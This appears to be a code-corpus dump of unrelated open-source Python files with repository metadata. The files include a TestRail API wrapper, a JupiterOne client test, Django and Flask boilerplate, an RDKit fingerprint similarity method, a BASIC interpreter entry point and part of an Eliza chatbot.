raise APIError("Error: Please check user id and password")
def __extract_dictionary(self, src_dict, extract_list, dict_type=Defines.DICT_SUB, ret_dict_key=Defines.TR_TP_ID):
"""
This method will extract and create a new dictionary based on the attributes passed.
The extraction can be done on a single plain dictionary or dictionary within a dictionary.
Note: The ret_dict_key must be an unique identifier as its the ret_dict key.
:param src_dict: Source dictionary
:param extract_list: List of keys to be extracted
:param dict_type: This parameter determines if we need to extract values from simple dictionary
or sub dictionaries
:param ret_dict_key: Key that must be used for return dictionary
:return: List of dictionary with ret_dict_key as key.
Example output ret_dict = { 1:{'description':'Example 1'} , 2: {'description': 'Example 2} }
"""
if extract_list:
# Extracting list containing dictionary of dictionary ( sub dictionary)
# Example [ 1:{'description':'Example 1'} , 2: {'description': 'Example 2} ]
if dict_type in Defines.DICT_SUB:
ret_dict = []
# This code applies on sub dictionary
for src_key in src_dict:
tmp_list = {}
for extract_key in extract_list:
# Check if the key is present in source dictionary ( dictionary of dictionary)
if extract_key in src_key:
tmp_list[extract_key] = src_key[extract_key]
else:
self._log.info(
"{} is invalid key or not present in the source dictionary".format(extract_key))
                    # update the return dictionary keyed by ret_dict_key (e.g. the plan id);
                    # dict_type is already known to be DICT_SUB in this branch
                    ret_dict.append({src_key[ret_dict_key]: tmp_list})
else:
# Extracting items from Plain dictionary
# In simple scenario it will return a dictionary not a list
ret_dict = {}
for extract_key in extract_list:
if extract_key in src_dict:
ret_dict[extract_key] = src_dict[extract_key]
else:
self._log.debug("Nothing to extract. All items will be returned")
ret_dict = src_dict
return ret_dict
def count_values_in_sub_dict(self, dict_list, grp_item_key):
"""
This method will group and count the keys of a sub dictionary
See the example in the doc string for output
:param dict_list: Input dictionary
:param grp_item_key: key which needs to be grouped
:return: count of the values in the sub dictionary
Example : [ A:{color:'a'}, B:{color:'b'}, C:{color:'a'}, D:{color:'a'}]
        output: {a: 3, b: 1}
"""
ret_dict = {}
cnt = 1
try:
for list_items in dict_list:
for key, value in list_items.items():
if value[grp_item_key] in ret_dict:
ret_dict[value[grp_item_key]] = ret_dict[value[grp_item_key]] + 1
else:
ret_dict[value[grp_item_key]] = cnt
except KeyError:
self._log.exception("KeyError Exception for key ")
return ret_dict
def tr_api_post(self, api, params):
"""
This method is a wrapper method to call the POST methods of TestRail
:param api: Test Rail API
:param params: Post parameters for the Test Rail API.
        :return: (status, message) tuple.
                 If status is True, the return message varies depending on
                 the api requested.
                 If status is False, the return message is the exception caught.
"""
status = False
try:
return_msg = self._client.send_post(api, params)
status = True
self._log.info("Successfully sent data using POST method. API = {} Data = {}".format(api, params))
except APIError as e:
self._log.exception("API Exception for api POST {} - Exception: {}".format(api, e))
return_msg = e
return status, return_msg
def tr_api_get(self, api, params):
"""
        This method is a wrapper method to call the GET methods of TestRail;
        it appends the parameters to the TestRail API path.
:param api: TestRail api to be called ( Example: get_case)
:param params: The GET parameters for API Methods
        :return: (status, message) tuple.
                 If status is True, the return message varies depending on
                 the api requested.
                 If status is False, the return message is the exception caught.
"""
status = False
try:
return_msg = self._client.send_get(api+"/"+str(params))
status = True
self._log.info("Successfully sent data using GET method. API = {} Data = {}".format(api, params))
except APIError as e:
self._log.exception("API Exception for api GET {} - Exception: {}".format(api, e))
return_msg = e
return status, return_msg
# Methods for TestRail Test Plans
def tr_get_all_plans(self, project_id, project_fields):
"""
This method will extract all the plans for a project. We can specify what attribute of TestRail project
We want to extract using project_fields.
:param project_id: Project id ( Example 1)
:param project_fields: This is a list of fields needed for project
Example: project passed count, failed count etc
:return: status( Boolean) and ret_list : list of Plans with attributes from project_fields
"""
ret_dict = None
status, ret_list = self.tr_api_get(Defines.TR_API_GET_PLANS, project_id)
if status:
ret_dict = self.__extract_dictionary(ret_list, project_fields)
return status, ret_dict
def tr_get_tc_suites_in_project(self, project_id=Defines.TR_CURRENT_PROJECT, extract_list=None):
"""
This method will get the suites available in the TestRail project
:param project_id: Project id
:param extract_list: The attribute required to be extracted from test suites
:return: Dictionary of project test suites with the attributes mentioned in extract_list
"""
# If the extract list is none at least extract the description
if extract_list is None:
extract_list = [Defines.TR_TS_DESCRIPTION]
ret_dict = {}
ret_status, suite_list = self.tr_api_get(Defines.TR_API_GET_SUITES, project_id)
if ret_status:
ret_dict = self.__extract_dictionary(suite_list, extract_list, ret_dict_key=Defines.TR_TS_ID)
else:
self._log.error("Error in getting test suites")
return ret_status, ret_dict
def tr_get_tescase_in_run(self, run_id, extract_list=None):
"""
This method will extract all the test for a run. You can pass what you want to extract using extract_list.
:param run_id: Test run id
:param extract_list: attributes that needs to be extracted
:return: list of dictionaries containing the test case information
"""
ret_list = []
# if the extract list is None. Extract the Description and automated fields
if extract_list is None:
extract_list = [Defines.TR_TC_CUSTOM_TEST_DESCRIPTION, Defines.TR_TC_CUSTOM_AUTOMATED]
status, tc_list = self.tr_api_get(Defines.TR_TESTS_GET_TESTS, run_id)
if status:
# For each test extract the required elements
for tst in tc_list:
ret_list.append(self.__extract_dictionary(tst, extract_list, dict_type=Defines.DICT_SIMPLE))
self._log.info("Extracted test cases successfully from run {}".format(run_id))
else:
self._log.error("Error in extracting the test cases for run {}".format(run_id))
return status, ret_list
def tr_get_test_cases(self, suite_id, extract_list=None):
"""
This method will get all the test cases of a suite. A suite in TestRail contains collection of
test cases
:param suite_id: suite id from TestRail
        :param extract_list: attributes to extract for each test case. Use the TR_TC_XXXX attributes
:return: Status , dictionary of test cases available for the suite
"""
ret_dict = {}
# if the extract list is none extract the description and created by fields
if extract_list is None:
extract_list = [Defines.TR_TC_CUSTOM_TEST_DESCRIPTION, Defines.TR_TC_CREATED_BY]
qry_str = str(Defines.TR_CURRENT_PROJECT) + "&" + Defines.TR_TS_SUITE_ID + "=" + str(suite_id)
status, ret_list = self.tr_api_get(Defines.TR_API_GET_CASES, qry_str)
if status:
ret_dict = self.__extract_dictionary(ret_list, extract_list, ret_dict_key=Defines.TR_TC_ID)
else:
self._log.error("Error in getting the test case")
return status, ret_dict
def tr_get_test_case_info(self, tc_id, extract_list=None):
ret_dict_list = None
# Extract title as default value
if extract_list is None:
extract_list = [Defines.TR_TC_TITLE]
status, ret_list = self.tr_api_get(Defines.TR_API_GET_CASE, tc_id)
if status:
ret_dict_list = self.__extract_dictionary(ret_list, extract_list, dict_type=Defines.DICT_SIMPLE,
ret_dict_key=Defines.TR_TC_ID)
else:
self._log.error("Error in executing API {}".format(Defines.TR_API_GET_CASE))
return status, ret_dict_list
    def tr_get_test_plan(self, plan_id):
"""
        This method will get the details of a test plan.
        A plan id starts with the RXXXX format in TestRail.
        :param plan_id: Test plan id
        :return: status (Boolean), test plan details
"""
status, ret_msg = self.tr_api_get(Defines.TR_API_GET_PLAN, plan_id)
if not status:
self._log.error("Error while getting the plan details for plan {}".format(plan_id))
return status, ret_msg
def tr_get_testsuite_info_in_test_plan(self, plan_id):
"""
This method will get the list of test suites in a test plan. The return dictionary
will also contain the config information of a test suite.
:param plan_id:
:return:
"""
# Testplan - > Test runs -> config
ret_dict_list = []
# First get the test plan details. Test plan will contain test suites.
# Test suites can have multiple Configurations
status, ret_msg = self.tr_get_test_plan(plan_id)
if status:
# Get the runs of the test plan. This can be extracted using the entries field in the test plan
tp_entries = ret_msg[Defines.TR_TP_ENTRIES]
if tp_entries:
# For each entries ( Test suites) get the suite information and the config information.
# Ex: a test suite A can be tested on different configs like iOS or Android
for entries_item in tp_entries:
runs = entries_item[Defines.TR_TP_RUNS]
for run in runs:
tmp = {run[Defines.TR_TS_ID]: {Defines.TR_TP_SUITE_ID: run[Defines.TR_TP_SUITE_ID],
Defines.TR_TP_TR_CONFIG: run[Defines.TR_TP_TR_CONFIG],
Defines.TR_TP_TR_CONFIG_IDS: run[Defines.TR_TP_TR_CONFIG_IDS]}}
ret_dict_list.append(tmp)
else:
# The plan has no suites. Make an entry in the logger
self._log.error(
"Test plan has no test suites selected. Check and add test suites to the test plan {}".format(
plan_id))
else:
self._log.error("Error in calling tr_get_test_plan for the run_id-{}".format(plan_id))
return status, ret_dict_list
def tr_get_testcase_in_test_plan(self, plan_id, extract_list=None):
"""
This method will collect the test in a test plan using the test plan id and segregates into automated
and manual test cases.
:param plan_id: Test plan id
:param extract_list: Attribute which need to be extracted
:return: status (Boolean), automated test cases, manual test cases
"""
automated_test_case_list = []
manual_test_case_list = []
# default extract list to id
if extract_list is None:
extract_list = [Defines.TR_TC_ID]
status, tp_info_list = self.tr_get_testsuite_info_in_test_plan(plan_id)
# Make sure if the automation key is present in the extract list.
# This step is required as we need to segregate manual and automated test cases
if Defines.TR_TC_CUSTOM_AUTOMATED not in extract_list:
extract_list.append(Defines.TR_TC_CUSTOM_AUTOMATED)
self._log.info("Adding {} key to the extract list".format(Defines.TR_TC_CUSTOM_AUTOMATED))
if status:
self._log.error("Extracted dictionary of plan {}".format(plan_id))
for run_dic in tp_info_list:
# For each item(suite) in test plan, extract the run-id(key) and the config params (keys)
for run_id, tp_suite_info in run_dic.items():
status, tc_list = self.tr_get_tescase_in_run(run_id, extract_list)
for tc in tc_list:
if tc['custom_automated']:
automated_test_case_list.append(tc)
else:
manual_test_case_list.append(tc)
else:
self._log.error("Error in extracting information from test plan {}".format(plan_id))
return status, automated_test_case_list, manual_test_case_list
def get_test_plan_results(self, plan_id, automated):
"""
This method will get all the test cases status (results) for a test plan.
This method will first find the runs of a test plan and then segregates the
test to manual and automated lists
:param plan_id: Plan id
:param automated:
Define.TR_MANUAL_TC = Manual test cases
Defines.TR_AUTOMATED_TC = Automated test cases
Defines.TR_ALL_TC = Manual and automated test cases
:return: status ( Boolean),
manual_tc ( Manual test case list) ,
automated_tc( Automated test case list)
"""
automated_tc = Defines.TR_TC_RESULTS_DICT.copy()
manual_tc = Defines.TR_TC_RESULTS_DICT.copy()
# Get all the test cases for the test plan
# If automation is True get only automated test case
status, automated_test_case_list, manual_test_case_list = self.tr_get_testcase_in_test_plan(plan_id, extract_list=[Defines.TR_TC_STATUS_ID])
# Get the results based on automated flag
if status:
try:
if automated in Defines.TR_MANUAL_TC or automated in Defines.TR_ALL_TC:
for tc in manual_test_case_list:
status_id = tc[Defines.TR_TC_STATUS_ID]
manual_tc[Defines.TR_TC_STATUS_DICT[status_id]] = manual_tc[Defines.TR_TC_STATUS_DICT[status_id]] + 1
if automated in Defines.TR_AUTOMATED_TC or automated in Defines.TR_ALL_TC:
for tc in automated_test_case_list:
status_id = tc[Defines.TR_TC_STATUS_ID]
automated_tc[Defines.TR_TC_STATUS_DICT[status_id]] = automated_tc[Defines.TR_TC_STATUS_DICT[status_id]] + 1
manual_tc[Defines.TC_TOTAL] = sum(manual_tc.values())
automated_tc[Defines.TC_TOTAL] = sum(automated_tc.values())
except KeyError:
# Raise the error else the result will not match with TestRail. The missing key needs to be fixed.
self._log.exception("Please check the TR_TC_STATUS_DICT parameters. Looks like these a mismatch with TestRail")
raise KeyError("Please check the TR_TC_STATUS_DICT parameters. Looks like these a mismatch with TestRail")
self._log.info("Manual test case = {}".format(manual_tc))
self._log.info("Automated test case = {}".format(automated_tc))
return status, manual_tc, automated_tc
def tr_add_test_case_result(self, run_id, case_id, status_id, jir_defect=None, version=None, comments=None, elapsed=None):
"""
        This method will post a result for a test case. We need the run id of the test plan
        and the case id of the test to post results.
:param run_id: (Mandatory) Run id of the test plan (Note: Suite id which starts with R example: RXXXX)
:param case_id: (Mandatory) Case if of the test case (Note: Case id starts with C example: CXXXX)
:param status_id: (Mandatory) One of the valid status id
(1:pass,2:blocked,3:Untested,4:retest,5:failed,6:Not implemented,7:Not Testable)
:param jir_defect: Any old or know jira defect for this test case
:param version: Test code version ( firmware version)
        :param comments: Any test comments for failure or pass
:param elapsed: Time for the test. Default is 2 seconds
:return: status( Boolean) , updated test case dictionary
"""
# Set the default values
if elapsed is None:
elapsed = Defines.TR_TC_RESULT_DEFAULT_EXEC_TIME
test_result = {
Defines.TR_TC_STATUS_ID: status_id,
Defines.TR_TC_RESULT_COMMENT: comments,
Defines.TR_TC_RESULT_ELAPSED: elapsed,
Defines.TR_TC_RESULT_VERSION: version,
Defines.TR_TC_RESULT_DEFECTS: jir_defect
}
# Make the api string
api_str = Defines.TR_API_ADD_RESULT_FOR_CASES + "/" + str(run_id) + "/" + str(case_id)
self._log.info("Adding results using API string {}".format(api_str))
# Call the API post method
status, return_msg = self.tr_api_post(api_str, test_result)
return status, return_msg
def tr_add_result(self, run_id, params=None):
"""
This method will add result to individual test run ( Starts with TXXXXX)
:param run_id: Test case Test run id
:param params: Parameters to set like status, comments etc
:return: status( Boolean) and return dictionary with updates
"""
if params is None:
params = {Defines.TR_TC_RESULT_ELAPSED: '0', Defines.TR_TC_STATUS_ID: 5}
api_str = Defines.TR_API_ADD_RESULT + "/" + str(run_id)
status, return_msg = self.tr_api_post(api_str, params)
if not status:
self._log.error("Error in adding results for run_id {}".format(run_id))
return status, return_msg
def add_result_for_entire_test_plan(self, test_plan_id, status_id, automated=Defines.TR_ALL_TC, comments=None, elapsed=None, version=None):
"""
        This method will set parameters like status, comments, version, etc. for the entire test plan.
        You can use this function to reset the entire plan before you start. Mostly useful in
        nightly test preparation.
"""
if elapsed is None:
elapsed = '0'
return_msg = None
# Collect all the test cases of a test plan
status, automated_test_case_list, manual_test_case_list = self.tr_get_testcase_in_test_plan(test_plan_id, extract_list=[Defines.TR_RUN_ID])
tc_list = []
if automated in Defines.TR_AUTOMATED_TC:
tc_list.append(automated_test_case_list)
elif automated in Defines.TR_MANUAL_TC:
tc_list.append(manual_test_case_list)
else:
tc_list.append(manual_test_case_list)
tc_list.append(automated_test_case_list)
for item in tc_list: # manual_test_case_list:
for tc in item:
api_str = Defines.TR_API_ADD_RESULT + "/" + str(tc[Defines.TR_RUN_ID])
param = {
Defines.TR_TC_RESULT_ELAPSED: str(elapsed),
Defines.TR_TC_STATUS_ID: status_id,
Defines.TR_TC_RESULT_COMMENT: comments,
Defines.TR_TC_RESULT_VERSION: version
}
status, return_msg = self.tr_api_post(api_str, param)
return status, return_msg
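# Hedged usage sketch (the URL, credentials, and ids below are placeholders,
# not values from this library or its trDefines module):
# if __name__ == '__main__':
#     tr = TestRailLib('https://example.testrail.io', 'user@example.com', 'secret')
#     ok, msg = tr.tr_add_test_case_result(run_id=42, case_id=1001, status_id=1,
#                                          comments='Automated pass')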
|
[
"prabhu.mc2@gmail.com"
] |
prabhu.mc2@gmail.com
|
b5bbf3c03b4a409008f345030301327f4049f887
|
f95bba42af9464545bdb1a312189e2b0e1412f30
|
/tests/test_create_relationship.py
|
2bd40420ccc32adf82bfb2d5247833eed1262d7a
|
[
"MIT"
] |
permissive
|
auth0/jupiterone-python-sdk
|
1b7f50ea6c6625ae2ca61761047e31d302b3d1f8
|
1c63eafa029ca3baa5ae6b93f05d98d02747aa2b
|
refs/heads/master
| 2023-06-23T08:59:45.910553
| 2022-10-24T16:18:49
| 2022-10-24T16:18:49
| 237,996,631
| 10
| 9
|
MIT
| 2023-08-22T13:39:18
| 2020-02-03T15:24:30
|
Python
|
UTF-8
|
Python
| false
| false
| 1,623
|
py
|
import json
import pytest
import responses
from jupiterone.client import JupiterOneClient
@responses.activate
def test_create_relationship():
def request_callback(request):
headers = {
'Content-Type': 'application/json'
}
response = {
'data': {
'createRelationship': {
'relationship': {
'_id': '1'
},
'edge': {
'id': '1',
'toVertexId': '1',
'fromVertexId': '2',
'relationship': {
'_id': '1'
},
'properties': {}
}
}
}
}
return (200, headers, json.dumps(response))
responses.add_callback(
responses.POST, 'https://api.us.jupiterone.io/graphql',
callback=request_callback,
content_type='application/json',
)
j1 = JupiterOneClient(account='testAccount', token='testToken')
response = j1.create_relationship(
relationship_key='relationship1',
relationship_type='test_relationship',
relationship_class='TestRelationship',
from_entity_id='2',
to_entity_id='1'
)
assert type(response) == dict
assert type(response['relationship']) == dict
assert response['relationship']['_id'] == '1'
assert response['edge']['toVertexId'] == '1'
assert response['edge']['fromVertexId'] == '2'
|
[
"george.vauter@auth0.com"
] |
george.vauter@auth0.com
|
e46bfe25ed1ca04c2013e5b3b818fe6d8d12426d
|
16b2c2365eff11f34ae260321e6dde78ab09b45d
|
/TMS/wsgi.py
|
19451fe2a8a2cafb0e33bcadb5ce91904d0b424c
|
[] |
no_license
|
laken11/TMS
|
bf941802e350a16db0f2314330ad315e73ce48f0
|
c271f2cbb1624ab943c10bacaa6406ec8ca08083
|
refs/heads/dev
| 2023-04-27T22:03:38.811267
| 2021-05-08T12:06:54
| 2021-05-08T12:06:54
| 362,518,465
| 0
| 0
| null | 2021-05-05T10:07:54
| 2021-04-28T15:27:28
|
Python
|
UTF-8
|
Python
| false
| false
| 383
|
py
|
"""
WSGI config for TMS project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'TMS.settings')
application = get_wsgi_application()
|
[
"olaniteolalekan@gmail.com"
] |
olaniteolalekan@gmail.com
|
1cf021d39e6b419e9c054d41ec05167e2b9249b1
|
91e8e668b01e07a038e1e711c2d4fb0a9384b044
|
/25sumofdigit.py
|
3136ad6cfddbfce977418b730bcb14f94efa1bca
|
[] |
no_license
|
parulkyadav/assignment
|
0e0fac8d612b71ec65eb262e90c20f20c03d6954
|
bb80ea96bb60b08b5770c2d35f9e232287a3b1e9
|
refs/heads/master
| 2020-03-31T03:26:51.477580
| 2018-10-06T17:45:25
| 2018-10-06T17:45:25
| 151,865,416
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 236
|
py
|
def counting(num):
    # counts the digits of num (0 is treated as one digit)
    n = num
    count = 0
    if n == 0:
        print(1)
    else:
        while n:
            n = int(n / 10)
            count += 1
        print(count)
counting(int(input("Enter a number : ")))
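# The filename (25sumofdigit.py) suggests a digit *sum*; a hedged sketch of
# that variant (my addition, not in the original):
def digit_sum(num):
    total = 0
    num = abs(num)
    while num:
        total += num % 10
        num //= 10
    return total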
|
[
"parul2595@gmail.com"
] |
parul2595@gmail.com
|
841df2c39bcbae541b5e564c3f096b97266701fb
|
daf04580e3725713274fcbbde1bfd6f5a5d3bf4e
|
/methods/ecfc/ecfc6_tanimoto.py
|
53466b68223243ea10edf4f94c05262c492e61f6
|
[
"MIT"
] |
permissive
|
skodapetr/lbvs-environment
|
c1c9b35a243d5ffdb335f3e9e8bc324ed222a0d7
|
0c468b9b87392ffe69e0e7726cf02cc6e2fec5e2
|
refs/heads/master
| 2022-01-18T18:58:37.823094
| 2019-07-31T09:01:50
| 2019-07-31T09:01:50
| 59,012,053
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,365
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import rdkit
from rdkit.Chem import AllChem
from rdkit import DataStructs
__license__ = "X11"
METADATA = {
"id": "method_rdkit_ecfc6_tanimoto",
"representation": "ecfc6",
"similarity": "tanimoto"
}
def _compute_fingerprint(molecule):
return AllChem.GetMorganFingerprint(molecule, 3)
def _compute_similarity(left, right):
return DataStructs.TanimotoSimilarity(left, right)
def create_model(train_ligands, train_decoys):
model = []
for molecule in train_ligands:
model.append({
"name": molecule.GetProp("_Name"),
"fingerprint": _compute_fingerprint(molecule)
})
model_information = {}
return model, model_information
def compute_score(model, molecule):
fingerprint = _compute_fingerprint(molecule)
similarities = [_compute_similarity(fingerprint, item["fingerprint"])
for item in model]
max_score = max(similarities)
index_of_max_score = similarities.index(max_score)
closest_molecule = model[index_of_max_score]
return {
"value": max_score,
"info": {
"closest": closest_molecule["name"]
}
}
def compute_similarity(left, right):
return _compute_similarity(_compute_fingerprint(left),
_compute_fingerprint(right))
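# Usage sketch (illustrative, not part of the original; assumes RDKit Mol
# objects with a "_Name" property are available):
# model, _ = create_model(train_ligands, train_decoys)
# result = compute_score(model, query_molecule)
# result["value"] is the best Tanimoto score and result["info"]["closest"]
# names the nearest training ligand.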
|
[
"skodapetr@gmail.com"
] |
skodapetr@gmail.com
|
39fcd96c8a3e146e586324569ed4fdcd59ca857f
|
e71eff6f896ba33ee4bdc8e0267d72ea2783222c
|
/models.py
|
723c0955ca7c37397c0347c6148acd76946c7336
|
[
"MIT"
] |
permissive
|
KMSkelton/cgm_flask
|
8861ebe2697fb5e5f5231e9ea2b66a9cd5c063c8
|
1ad92522e1af4bd7af4a88d4fb503dab8cc260a8
|
refs/heads/master
| 2021-07-08T20:45:00.665610
| 2019-01-18T23:47:05
| 2019-01-18T23:47:05
| 96,000,251
| 1
| 0
|
MIT
| 2019-01-18T23:47:06
| 2017-07-02T03:30:45
|
Python
|
UTF-8
|
Python
| false
| false
| 2,042
|
py
|
from flask import Flask
from marshmallow import Schema, fields, pre_load, validate
from flask_marshmallow import Marshmallow
from flask_sqlalchemy import SQLAlchemy
ma = Marshmallow()
db = SQLAlchemy()
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(128))
username = db.Column(db.String(128), unique=True)
def __init__(self, name, username):
self.username = username
self.name = name
def __repr__(self):
return '<USER {}>'.format(self.name)
class Device(db.Model):
id = db.Column(db.Integer, primary_key=True)
model = db.Column(db.String(75))
manufacturerID = db.Column(db.String(20), unique=True)
def __init__(self, id, model, manufacturerID):
self.id = id
self.model = model
self.manufacturerID = manufacturerID
user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)
user = db.relationship('User',
backref=db.backref('devices', lazy='dynamic'))
class Measurement(db.Model):
id = db.Column(db.Integer, primary_key=True)
meas_date = db.Column(db.DateTime)
event_type = db.Column(db.String(20))
manufacturerID = db.Column(db.String(20))
gluc_value = db.Column(db.Integer)
insulin_value = db.Column(db.Integer)
carb = db.Column(db.Float)
#joins are worse than duplicated data
def __init__(self, id, meas_date, event_type, manufacturerID, gluc_value, insulin_value, carb):
self.id = id
self.meas_date = meas_date
self.event_type = event_type
self.manufacturerID = manufacturerID
self.gluc_value = gluc_value
self.insulin_value = insulin_value
self.carb = carb
device_id = db.Column(db.Integer, db.ForeignKey('device.id'))
device = db.relationship('Device')
# backref=db.backref('devices', lazy='dynamic'))
user_id = db.Column(db.Integer, db.ForeignKey('user.id'))
user = db.relationship('User')
# backref=db.backref('users', lazy='dynamic'))
|
[
"kmskelton@outlook.com"
] |
kmskelton@outlook.com
|
e6017e8174729d1a2e020467fb7410b382ca9c2d
|
00b9eb134285e97a90fc416e2df4b736fcb14320
|
/main.py
|
dc01c409fc68a566cefa7e6e1beacdffd53eaf46
|
[] |
no_license
|
richmoore/very-basic
|
1caf7d1220c697282a70336dae8444230dcc6852
|
6f2ca6ac3eaa0424336f8b501afd26bab220a9b5
|
refs/heads/master
| 2020-05-20T15:29:48.294263
| 2012-04-09T19:40:27
| 2012-04-09T19:40:27
| 32,982,462
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 819
|
py
|
#!/usr/bin/python -tt
from lexer import tokenize
from parser import Parser
from runtime import run
def print_tree(tree, terminals, indent=0):
"""Print a parse tree to stdout."""
prefix = " "*indent
if tree[0] in terminals:
print prefix + repr(tree)
else:
print prefix + unicode(tree[0])
for x in tree[1:]:
print_tree(x, terminals, indent+1)
def main(filename):
input = open(filename)
parser = Parser()
try:
tree = parser.parse(tokenize(input))
#print_tree(tree, parser.terminals)
run(tree)
except parser.ParseErrors, e:
for token, expected in e.errors:
print 'Found', token, 'when', expected, 'was expected'
if __name__ == '__main__':
import sys
filename = sys.argv[1]
main(filename)
|
[
"rich@kde.org"
] |
rich@kde.org
|
0ee2be706cd349155154197d8f187ac59b1fad33
|
4ae6c47d843d749c9c85543bd76ddc4da6bb06f4
|
/dataformat-json-jackson/src/test/resources/org/camunda/spin/python/json/tree/JsonTreeJsonPathPythonTest.shouldFailReadingElementList.py
|
05c2c70b8d6ee285aee78bd1f87abe34863a645e
|
[
"Apache-2.0"
] |
permissive
|
nibin/camunda-spin
|
2a34943ffdec9edff26ea80555292c079b16f656
|
327204a0b9281fe793241c6499f666d4ddc5d1b0
|
refs/heads/master
| 2021-01-23T23:03:44.093281
| 2014-11-12T12:57:37
| 2014-11-12T12:58:17
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 66
|
py
|
jsonNode = JSON(input)
jsonNode.jsonPath('$.order').elementList()
|
[
"stefan.hentschel@camunda.com"
] |
stefan.hentschel@camunda.com
|
4b8dba5ffb48cb94ad49375363ab728d9412e3b6
|
4a91cc8b51d7f03afceaa1b3ce06439dfc2907cb
|
/eliza/eliza.py
|
04eb24ed8b66b52ab3f7a3c9219deaa7532d8bff
|
[
"MIT"
] |
permissive
|
Marcombo/curso_IoT
|
b2e1c6bdfd2574bb3fc3d61b89409adc1e6bca21
|
d38b58ed9be87bcfc267623abce4ad16fad2f8ed
|
refs/heads/master
| 2023-04-08T03:24:50.327703
| 2021-04-15T18:13:36
| 2021-04-15T18:13:36
| 274,207,613
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,165
|
py
|
#----------------------------------------------------------------------
# eliza.py
#
# a cheezy little Eliza knock-off by Joe Strout
# with some updates by Jeff Epler
# hacked into a module and updated by Jez Higgins
#----------------------------------------------------------------------
import string
import re
import random
class Eliza:
def __init__(self):
self.keys = list(map(lambda x: re.compile(x[0], re.IGNORECASE), gPats))
self.values = list(map(lambda x: x[1], gPats))
#----------------------------------------------------------------------
# translate: take a string, replace any words found in vocabulary.keys()
# with the corresponding vocabulary.values()
#----------------------------------------------------------------------
def translate(self, text, vocabulary):
words = text.lower().split()
        keys = vocabulary.keys()
for i in range(0, len(words)):
if words[i] in keys:
words[i] = vocabulary[words[i]]
return ' '.join(words)
#----------------------------------------------------------------------
# respond: take a string, a set of regexps, and a corresponding
# set of response lists; find a match, and return a randomly
# chosen response from the corresponding list.
#----------------------------------------------------------------------
def respond(self, text):
# find a match among keys
for i in range(0, len(self.keys)):
match = self.keys[i].match(text)
if match:
# found a match ... stuff with corresponding value
# chosen randomly from among the available options
resp = random.choice(self.values[i])
# we've got a response... stuff in reflected text where indicated
pos = resp.find('%')
while pos > -1:
num = int(resp[pos+1:pos+2])
resp = resp[:pos] + \
self.translate(match.group(num), gReflections) + \
resp[pos+2:]
pos = resp.find('%')
# fix munged punctuation at the end
if resp[-2:] == '?.': resp = resp[:-2] + '.'
if resp[-2:] == '??': resp = resp[:-2] + '?'
return resp
return None
#----------------------------------------------------------------------
# gReflections, a translation table used to convert things you say
# into things the computer says back, e.g. "I am" --> "you are"
#----------------------------------------------------------------------
gReflections = {
"am" : "are",
"was" : "were",
"i" : "you",
"i'd" : "you would",
"i've" : "you have",
"i'll" : "you will",
"my" : "your",
"are" : "am",
"you've": "I have",
"you'll": "I will",
"your" : "my",
"yours" : "mine",
"you" : "me",
"me" : "you"
}
#----------------------------------------------------------------------
# gPats, the main response table. Each element of the list is a
# two-element list; the first is a regexp, and the second is a
# list of possible responses, with group-macros labelled as
# %1, %2, etc.
#----------------------------------------------------------------------
gPats = [
[r'I need (.*)',
[ "Why do you need %1?",
"Would it really help you to get %1?",
"Are you sure you need %1?"]],
[r'Why don\'?t you ([^\?]*)\??',
[ "Do you really think I don't %1?",
"Perhaps eventually I will %1.",
"Do you really want me to %1?"]],
[r'Why can\'?t I ([^\?]*)\??',
[ "Do you think you should be able to %1?",
"If you could %1, what would you do?",
"I don't know -- why can't you %1?",
"Have you really tried?"]],
[r'I can\'?t (.*)',
[ "How do you know you can't %1?",
"Perhaps you could %1 if you tried.",
"What would it take for you to %1?"]],
[r'I am (.*)',
[ "Did you come to me because you are %1?",
"How long have you been %1?",
"How do you feel about being %1?"]],
[r'I\'?m (.*)',
[ "How does being %1 make you feel?",
"Do you enjoy being %1?",
"Why do you tell me you're %1?",
"Why do you think you're %1?"]],
[r'Are you ([^\?]*)\??',
[ "Why does it matter whether I am %1?",
"Would you prefer it if I were not %1?",
"Perhaps you believe I am %1.",
"I may be %1 -- what do you think?"]],
[r'What (.*)',
[ "Why do you ask?",
"How would an answer to that help you?",
"What do you think?"]],
[r'How (.*)',
[ "How do you suppose?",
"Perhaps you can answer your own question.",
"What is it you're really asking?"]],
[r'Because (.*)',
[ "Is that the real reason?",
"What other reasons come to mind?",
"Does that reason apply to anything else?",
"If %1, what else must be true?"]],
[r'(.*) sorry (.*)',
[ "There are many times when no apology is needed.",
"What feelings do you have when you apologize?"]],
[r'Hello(.*)',
[ "Hello... I'm glad you could drop by today.",
"Hi there... how are you today?",
"Hello, how are you feeling today?"]],
[r'I think (.*)',
[ "Do you doubt %1?",
"Do you really think so?",
"But you're not sure %1?"]],
[r'(.*) friend (.*)',
[ "Tell me more about your friends.",
"When you think of a friend, what comes to mind?",
"Why don't you tell me about a childhood friend?"]],
[r'Yes',
[ "You seem quite sure.",
"OK, but can you elaborate a bit?"]],
[r'(.*) computer(.*)',
[ "Are you really talking about me?",
"Does it seem strange to talk to a computer?",
"How do computers make you feel?",
"Do you feel threatened by computers?"]],
[r'Is it (.*)',
[ "Do you think it is %1?",
"Perhaps it's %1 -- what do you think?",
"If it were %1, what would you do?",
"It could well be that %1."]],
[r'It is (.*)',
[ "You seem very certain.",
"If I told you that it probably isn't %1, what would you feel?"]],
[r'Can you ([^\?]*)\??',
[ "What makes you think I can't %1?",
"If I could %1, then what?",
"Why do you ask if I can %1?"]],
[r'Can I ([^\?]*)\??',
[ "Perhaps you don't want to %1.",
"Do you want to be able to %1?",
"If you could %1, would you?"]],
[r'You are (.*)',
[ "Why do you think I am %1?",
"Does it please you to think that I'm %1?",
"Perhaps you would like me to be %1.",
"Perhaps you're really talking about yourself?"]],
[r'You\'?re (.*)',
[ "Why do you say I am %1?",
"Why do you think I am %1?",
"Are we talking about you, or me?"]],
[r'I don\'?t (.*)',
